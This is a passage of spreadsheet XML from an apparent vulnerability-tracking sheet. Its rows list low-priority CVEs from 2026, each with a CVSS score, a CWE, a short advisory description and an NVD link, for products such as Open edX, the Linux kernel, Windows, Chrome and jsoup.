      <c r="G5504" s="5" t="inlineStr"/>
      <c r="H5504" s="5" t="inlineStr"/>
      <c r="I5504" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J5504" s="5" t="inlineStr"/>
      <c r="K5504" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L5504" s="5" t="inlineStr">
        <is>
          <t>Open edX Platform enables the authoring and delivery of online learning at any scale. Prior to commit 3a5ac85, a security vulnerability has been identified in the Open edX LMS platform's LTI (Learning Tools Interoperability) Provider implementation. The validate_timestamp_and_nonce function in lms/djangoapps/lti_provider/signature_validator.py does not validate OAuth nonces or timestamps, allowing an attacker who captures a valid LTI launch request to replay it an unlimited number of times without detection. This issue has been patched via commit 3a5ac85.</t>
        </is>
      </c>
      <c r="M5504" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53636</t>
        </is>
      </c>
    </row>
    <row r="5505">
      <c r="A5505" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5505" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56136</t>
        </is>
      </c>
      <c r="C5505" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5505" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5505" s="5" t="inlineStr"/>
      <c r="F5505" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5505" s="5" t="inlineStr"/>
      <c r="H5505" s="5" t="inlineStr"/>
      <c r="I5505" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J5505" s="5" t="inlineStr"/>
      <c r="K5505" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5505" s="5" t="inlineStr">
        <is>
          <t>In NTFS-3G through 2026.2.25, an out-of-bounds read exists in ntfs_ir_nill() in libntfs-3g/index.c that allows an attacker to read possibly confidential information in an ntfs-3g process by crafting a malicious NTFS image. This read operation is triggered by creation of a file with a crafted name.</t>
        </is>
      </c>
      <c r="M5505" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56136</t>
        </is>
      </c>
    </row>
    <row r="5506">
      <c r="A5506" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5506" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62845</t>
        </is>
      </c>
      <c r="C5506" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5506" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5506" s="5" t="inlineStr"/>
      <c r="F5506" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5506" s="5" t="inlineStr">
        <is>
          <t>kubernetes, postgresql, mysql</t>
        </is>
      </c>
      <c r="H5506" s="5" t="inlineStr"/>
      <c r="I5506" s="5" t="inlineStr">
        <is>
          <t>2026-07-30</t>
        </is>
      </c>
      <c r="J5506" s="5" t="inlineStr"/>
      <c r="K5506" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L5506" s="5" t="inlineStr">
        <is>
          <t>Kamaji is the Hosted Control Plane Manager for Kubernetes. Prior to 26.7.4-edge, the PostgreSQL and MySQL datastore drivers build DDL statements by interpolating the user-supplied DataStoreUsername/DataStoreSchema directly into SQL via fmt.Sprintf, without escaping identifiers. These fields have no format validation, so a value containing a quote character breaks out of the quoted identifier — SQL injection executed over Kamaji's root connection to the shared datastore. etcd driver is not affected.This issue is fixed in version 26.7.4-edge.</t>
        </is>
      </c>
      <c r="M5506" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62845</t>
        </is>
      </c>
    </row>
    <row r="5507">
      <c r="A5507" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5507" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64373</t>
        </is>
      </c>
      <c r="C5507" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5507" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5507" s="5" t="inlineStr"/>
      <c r="F5507" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5507" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H5507" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I5507" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J5507" s="5" t="inlineStr"/>
      <c r="K5507" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5507" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cpufreq: Fix hotplug-suspend race during reboot
During system reboot, cpufreq_suspend() is called via the
kernel_restart() -&gt; device_shutdown() path. Unlike the normal system
suspend path, the reboot path does not call freeze_processes(), so
userspace processes and kernel threads remain active.
This allows CPU hotplug operations to run concurrently with
cpufreq_suspend(). The original code has no synchronization with CPU
hotplug, leading to a race condition where governor_data can be freed
by the hotplug path while cpufreq_suspend() is still accessing it,
resulting in a null pointer dereference:
  Unable to handle kernel NULL pointer dereference
  Call Trace:
   do_kernel_fault+0x28/0x3c
   cpufreq_suspend+0xdc/0x160
   device_shutdown+0x18/0x200
   kernel_restart+0x40/0x80
   arm64_sys_reboot+0x1b0/0x200
Fix this by adding cpus_read_lock()/cpus_read_unlock() to
cpufreq_suspend() to block CPU hotplug operations while suspend is in
progress.
[ rjw: Changelog edits ]</t>
        </is>
      </c>
      <c r="M5507" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64373</t>
        </is>
      </c>
    </row>
    <row r="5508">
      <c r="A5508" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5508" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68849</t>
        </is>
      </c>
      <c r="C5508" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5508" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5508" s="5" t="inlineStr"/>
      <c r="F5508" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5508" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5508" s="5" t="inlineStr"/>
      <c r="I5508" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5508" s="5" t="inlineStr"/>
      <c r="K5508" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5508" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Bluetooth Port Driver allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5508" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68849</t>
        </is>
      </c>
    </row>
    <row r="5509">
      <c r="A5509" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5509" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68891</t>
        </is>
      </c>
      <c r="C5509" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5509" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5509" s="5" t="inlineStr"/>
      <c r="F5509" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5509" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H5509" s="5" t="inlineStr"/>
      <c r="I5509" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5509" s="5" t="inlineStr"/>
      <c r="K5509" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5509" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Microsoft Standard XPS allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5509" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68891</t>
        </is>
      </c>
    </row>
    <row r="5510">
      <c r="A5510" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5510" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69316</t>
        </is>
      </c>
      <c r="C5510" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5510" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5510" s="5" t="inlineStr"/>
      <c r="F5510" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5510" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5510" s="5" t="inlineStr"/>
      <c r="I5510" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5510" s="5" t="inlineStr"/>
      <c r="K5510" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="L5510" s="5" t="inlineStr">
        <is>
          <t>Buffer over-read in Windows Overlay Filter allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5510" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69316</t>
        </is>
      </c>
    </row>
    <row r="5511">
      <c r="A5511" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5511" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69425</t>
        </is>
      </c>
      <c r="C5511" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5511" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5511" s="5" t="inlineStr"/>
      <c r="F5511" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5511" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5511" s="5" t="inlineStr"/>
      <c r="I5511" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5511" s="5" t="inlineStr"/>
      <c r="K5511" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5511" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows NTFS allows an authorized attacker to perform tampering locally.</t>
        </is>
      </c>
      <c r="M5511" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69425</t>
        </is>
      </c>
    </row>
    <row r="5512">
      <c r="A5512" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5512" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69483</t>
        </is>
      </c>
      <c r="C5512" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5512" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5512" s="5" t="inlineStr"/>
      <c r="F5512" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5512" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5512" s="5" t="inlineStr"/>
      <c r="I5512" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5512" s="5" t="inlineStr"/>
      <c r="K5512" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5512" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Image Acquisition allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5512" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69483</t>
        </is>
      </c>
    </row>
    <row r="5513">
      <c r="A5513" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5513" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69771</t>
        </is>
      </c>
      <c r="C5513" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5513" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5513" s="5" t="inlineStr"/>
      <c r="F5513" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5513" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5513" s="5" t="inlineStr"/>
      <c r="I5513" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5513" s="5" t="inlineStr"/>
      <c r="K5513" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L5513" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Container Manager Service allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M5513" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69771</t>
        </is>
      </c>
    </row>
    <row r="5514">
      <c r="A5514" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5514" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69792</t>
        </is>
      </c>
      <c r="C5514" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5514" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5514" s="5" t="inlineStr"/>
      <c r="F5514" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5514" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5514" s="5" t="inlineStr"/>
      <c r="I5514" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5514" s="5" t="inlineStr"/>
      <c r="K5514" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L5514" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Win32K allows an authorized attacker to bypass a security feature locally.</t>
        </is>
      </c>
      <c r="M5514" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69792</t>
        </is>
      </c>
    </row>
    <row r="5515">
      <c r="A5515" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5515" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69853</t>
        </is>
      </c>
      <c r="C5515" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5515" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5515" s="5" t="inlineStr"/>
      <c r="F5515" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5515" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5515" s="5" t="inlineStr"/>
      <c r="I5515" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5515" s="5" t="inlineStr"/>
      <c r="K5515" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5515" s="5" t="inlineStr">
        <is>
          <t>Use of uninitialized resource in Windows Win32K allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5515" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69853</t>
        </is>
      </c>
    </row>
    <row r="5516">
      <c r="A5516" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5516" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69895</t>
        </is>
      </c>
      <c r="C5516" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5516" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5516" s="5" t="inlineStr"/>
      <c r="F5516" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5516" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5516" s="5" t="inlineStr"/>
      <c r="I5516" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5516" s="5" t="inlineStr"/>
      <c r="K5516" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5516" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Spaceport.sys allows an authorized attacker to disclose information locally.</t>
        </is>
      </c>
      <c r="M5516" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69895</t>
        </is>
      </c>
    </row>
    <row r="5517">
      <c r="A5517" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5517" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71497</t>
        </is>
      </c>
      <c r="C5517" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5517" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5517" s="5" t="inlineStr"/>
      <c r="F5517" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5517" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H5517" s="5" t="inlineStr"/>
      <c r="I5517" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J5517" s="5" t="inlineStr"/>
      <c r="K5517" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5517" s="5" t="inlineStr">
        <is>
          <t>jsoup is a Java library for working with real-world HTML. From 1.14.3 until 1.23.1, jsoup's HTML parser could incorrectly handle a malformed tag name ending in a control character, causing the tag to acquire the parsing behavior of a different element. When a custom Safelist permits certain raw-text elements, this misparsing can cause content that should remain inert text to be emitted as active markup after serialization, potentially resulting in cross-site scripting. jsoup's built-in Safelists are not affected. This issue is fixed in version 1.23.1.</t>
        </is>
      </c>
      <c r="M5517" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71497</t>
        </is>
      </c>
    </row>
    <row r="5518">
      <c r="A5518" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5518" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72931</t>
        </is>
      </c>
      <c r="C5518" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5518" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5518" s="5" t="inlineStr"/>
      <c r="F5518" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5518" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H5518" s="5" t="inlineStr"/>
      <c r="I5518" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J5518" s="5" t="inlineStr"/>
      <c r="K5518" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="L5518" s="5" t="inlineStr">
        <is>
          <t>Missing release of resource after effective lifetime in Windows Secure Socket Tunneling Protocol (SSTP) allows an authorized attacker to deny service locally.</t>
        </is>
      </c>
      <c r="M5518" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72931</t>
        </is>
      </c>
    </row>
    <row r="5519">
      <c r="A5519" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5519" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73490</t>
        </is>
      </c>
      <c r="C5519" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5519" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5519" s="5" t="inlineStr"/>
      <c r="F5519" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5519" s="5" t="inlineStr"/>
      <c r="H5519" s="5" t="inlineStr"/>
      <c r="I5519" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J5519" s="5" t="inlineStr"/>
      <c r="K5519" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5519" s="5" t="inlineStr">
        <is>
          <t>Loofah is a general library for manipulating and transforming HTML/XML documents and fragments, built on top of Nokogiri. Prior to 2.25.2, Loofah's HTML5 sanitizer applies its local-reference restriction only to the xlink:href attribute on SVG use and feImage elements, while browsers also accept the plain href attribute. A crafted sanitized SVG can therefore reference an arbitrary same-origin external document; use may render external SVG content containing scripts or other dangerous content, and feImage may load external images for tracking. Applications that sanitize user-supplied SVG with Loofah's default allowlist are affected. This issue is fixed in version 2.25.2.</t>
        </is>
      </c>
      <c r="M5519" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73490</t>
        </is>
      </c>
    </row>
    <row r="5520">
      <c r="A5520" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5520" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80171</t>
        </is>
      </c>
      <c r="C5520" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5520" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5520" s="5" t="inlineStr"/>
      <c r="F5520" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5520" s="5" t="inlineStr"/>
      <c r="H5520" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="I5520" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5520" s="5" t="inlineStr"/>
      <c r="K5520" s="5" t="inlineStr">
        <is>
          <t>CWE-331</t>
        </is>
      </c>
      <c r="L5520" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Insufficient Entropy in PRNG vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to elevation of privileges.</t>
        </is>
      </c>
      <c r="M5520" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80171</t>
        </is>
      </c>
    </row>
    <row r="5521">
      <c r="A5521" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5521" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80176</t>
        </is>
      </c>
      <c r="C5521" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5521" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5521" s="5" t="inlineStr"/>
      <c r="F5521" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G5521" s="5" t="inlineStr"/>
      <c r="H5521" s="5" t="inlineStr"/>
      <c r="I5521" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J5521" s="5" t="inlineStr"/>
      <c r="K5521" s="5" t="inlineStr">
        <is>
          <t>CWE-257</t>
        </is>
      </c>
      <c r="L5521" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Plaintext Storage of a Password vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to information disclosure.</t>
        </is>
      </c>
      <c r="M5521" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80176</t>
        </is>
      </c>
    </row>
    <row r="5522">
      <c r="A5522" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5522" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81741</t>
        </is>
      </c>
      <c r="C5522" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5522" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5522" s="5" t="inlineStr"/>
      <c r="F5522" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5522" s="5" t="inlineStr"/>
      <c r="H5522" s="5" t="inlineStr"/>
      <c r="I5522" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5522" s="5" t="inlineStr"/>
      <c r="K5522" s="5" t="inlineStr">
        <is>
          <t>CWE-601</t>
        </is>
      </c>
      <c r="L5522" s="5" t="inlineStr">
        <is>
          <t>The Groundhogg — CRM, Newsletters, and Marketing Automation WordPress plugin before 4.7.2 does not restrict the redirect target of its email preference confirmation flow to the site's own host, allowing unauthenticated attackers to redirect visitors to an arbitrary external URL by way of a crafted link.</t>
        </is>
      </c>
      <c r="M5522" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81741</t>
        </is>
      </c>
    </row>
    <row r="5523">
      <c r="A5523" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5523" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87555</t>
        </is>
      </c>
      <c r="C5523" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5523" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5523" s="5" t="inlineStr"/>
      <c r="F5523" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G5523" s="5" t="inlineStr"/>
      <c r="H5523" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I5523" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5523" s="5" t="inlineStr"/>
      <c r="K5523" s="5" t="inlineStr">
        <is>
          <t>CWE-908</t>
        </is>
      </c>
      <c r="L5523" s="5" t="inlineStr">
        <is>
          <t>Uninitialized resource in GPU in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker to read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M5523" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87555</t>
        </is>
      </c>
    </row>
    <row r="5524">
      <c r="A5524" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5524" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87602</t>
        </is>
      </c>
      <c r="C5524" s="5" t="n">
        <v>4.7</v>
      </c>
      <c r="D5524" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5524" s="5" t="inlineStr"/>
      <c r="F5524" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5524" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H5524" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="I5524" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J5524" s="5" t="inlineStr"/>
      <c r="K5524" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L5524" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in ANGLE in Google Chrome on on Windows prior to 153.0.8010.36 allowed a remote attacker to potentially read memory outside the sandbox via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M5524" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87602</t>
        </is>
      </c>
    </row>
    <row r="5525">
      <c r="A5525" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5525" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14337</t>
        </is>
      </c>
      <c r="C5525" s="5" t="n">
        <v>4.6</v>
      </c>
      <c r="D5525" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E5525" s="5" t="inlineStr"/>
      <c r="F5525" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G5525" s="5" t="inlineStr"/>
      <c r="H5525" s="5" t="inlineStr"/>
      <c r="I5525" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J5525" s="5" t="inlineStr"/>
      <c r="K5525" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L5525" s="5" t="inlineStr">
        <is>
          <t>Pega Platform versions 23.1.0 through 25.1.3 are affected by an Stored Cross-site scripting (XSS) vulnerability in a user interface component. Requires a high privileged user with a developer role.</t>
        </is>
      </c>
      <c r="M5525" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14337</t>
        </is>
      </c>
    </row>
    <row r="5526">
      <c r="A5526" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B5526" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18741</t>
        </is>
      </c>
      <c r="C5526" s="5" t="n">
        <v>4.6</v>
      </c>
